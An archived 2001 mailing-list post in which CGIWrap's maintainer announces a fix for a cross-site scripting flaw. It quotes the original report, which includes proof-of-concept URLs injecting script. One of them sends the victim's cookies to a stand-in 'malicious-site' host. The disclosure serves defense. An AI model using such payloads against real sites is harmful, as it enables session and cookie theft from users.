OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Nathan Neulinger (nneulumr.edu)
Date: Sun Jul 22 2001 - 12:39:03 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    The following cross-site scripting vulnerability was reported in
    cgiwrap. This has just been corrected in version 3.7 which has just been
    released.

    http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

    All error message output is now html encoded to prevent this problem.

    -- Nathan

    > "TAKAGI, Hiromitsu" wrote:
    > >
    > > Hi,
    > >
    > > I found a cross-site scripting vulnerability in CGIWrap. Cookies
    > > issued by the server on which CGIWrap is installed can be stolen.
    > >
    > > Please try to access the following URLs.
    > >
    > > Confirming the bug:
    > > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
    > > http://www.unixtools.org/cgi-bin/cgiwrap/>
    > >
    http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>TEST</S>
    > > JavaScript code will be executed:
    > >
    http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>alert(document.domain)</SCRIPT>
    > >
    http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>document.write(document.domain)</SCRIPT>
    > >
    http://www.unixtools.org/cgi-bin/cgiwrap/)>
    > > Stealing your Cookies issued by www.unixtools.org, if any:
    > >
    http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
    > >
    <snip>
    > >
    > > Regards,
    > > --
    > > Hiromitsu Takagi, Ph.D.
    > > National Institute of Advanced Industrial Science and Technology,
    > > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
    > > http://www.etl.go.jp/~takagi/
    >
    > _______________________________________________
    > cgiwrap-users mailing list
    > cgiwrap-userslists.sourceforge.net
    > http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

    -- 
    

    ------------------------------------------------------------ Nathan Neulinger EMail: nneulumr.edu University of Missouri - Rolla Phone: (573) 341-4841 CIS - Systems Programming Fax: (573) 341-4216